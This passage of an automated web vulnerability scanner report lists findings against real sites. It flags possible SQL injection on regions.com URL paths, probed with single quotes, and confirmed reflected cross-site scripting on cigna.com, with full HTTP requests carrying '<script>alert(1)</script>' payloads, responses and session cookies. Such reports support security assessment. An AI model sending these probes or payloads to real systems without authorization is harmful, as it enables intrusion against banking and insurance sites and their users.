Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.43. http://www.regions.com/personal_banking/online_security.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/online_security.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/online_security.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 194

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fonline_security.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.44. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/open_account.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/open_account.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555436808:ss=1305555382886

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fopen_account.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/open_account.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555436808:ss=1305555382886

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

2. Cross-site scripting (reflected)  previous  next
There are 33 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://cigna.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75b7d<script>alert(1)</script>b5413ef51e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico75b7d<script>alert(1)</script>b5413ef51e0 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559757583:ss=1305559757583; __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.1.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:36 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/favicon.ico75b7d<script>alert(1)</script>b5413ef51e0</b>
...[SNIP]...

2.2. http://cigna.com/login_registration/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /login_registration/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53ee6<script>alert(1)</script>63c836bfb50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_registration53ee6<script>alert(1)</script>63c836bfb50/index.html HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559773497:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.2.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:14 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/login_registration53ee6<script>alert(1)</script>63c836bfb50/index.html</b>
...[SNIP]...

2.3. http://cigna.com/login_registration/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /login_registration/index.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fde21<script>alert(1)</script>e5bcadbc356 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_registration/index.htmlfde21<script>alert(1)</script>e5bcadbc356 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559773497:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.2.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:19 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/login_registration/index.htmlfde21<script>alert(1)</script>e5bcadbc356</b>
...[SNIP]...

2.4. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89d66<script>alert(1)</script>919d3f45b2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites89d66<script>alert(1)</script>919d3f45b2b/toolkit/managers_disability/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:23 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites89d66<script>alert(1)</script>919d3f45b2b/toolkit/managers_disability/home.htm</b>
...[SNIP]...

2.5. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef80a<script>alert(1)</script>48d4a60f3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitef80a<script>alert(1)</script>48d4a60f3f/managers_disability/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:29 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitef80a<script>alert(1)</script>48d4a60f3f/managers_disability/home.htm</b>
...[SNIP]...

2.6. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8584b<script>alert(1)</script>de6d80b3cf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability8584b<script>alert(1)</script>de6d80b3cf2/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:40 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability8584b<script>alert(1)</script>de6d80b3cf2/home.htm</b>
...[SNIP]...

2.7. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 802b0<script>alert(1)</script>44abdc7d08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/home.htm802b0<script>alert(1)</script>44abdc7d08 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/home.htm802b0<script>alert(1)</script>44abdc7d08</b>
...[SNIP]...

2.8. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9a72<script>alert(1)</script>de756e927fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesf9a72<script>alert(1)</script>de756e927fc/toolkit/managers_disability/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:20 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesf9a72<script>alert(1)</script>de756e927fc/toolkit/managers_disability/return/index.htm</b>
...[SNIP]...

2.9. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9efd<script>alert(1)</script>a51c3f8dc29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitc9efd<script>alert(1)</script>a51c3f8dc29/managers_disability/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:31 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitc9efd<script>alert(1)</script>a51c3f8dc29/managers_disability/return/index.htm</b>
...[SNIP]...

2.10. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f337<script>alert(1)</script>a1ab20d2a80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability8f337<script>alert(1)</script>a1ab20d2a80/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:37 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability8f337<script>alert(1)</script>a1ab20d2a80/return/index.htm</b>
...[SNIP]...

2.11. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7469<script>alert(1)</script>2bbe4b818d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

